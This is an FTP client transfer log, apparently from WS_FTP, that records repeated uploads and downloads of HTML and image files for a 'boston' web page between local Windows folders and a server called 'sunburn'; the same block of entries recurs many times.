10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
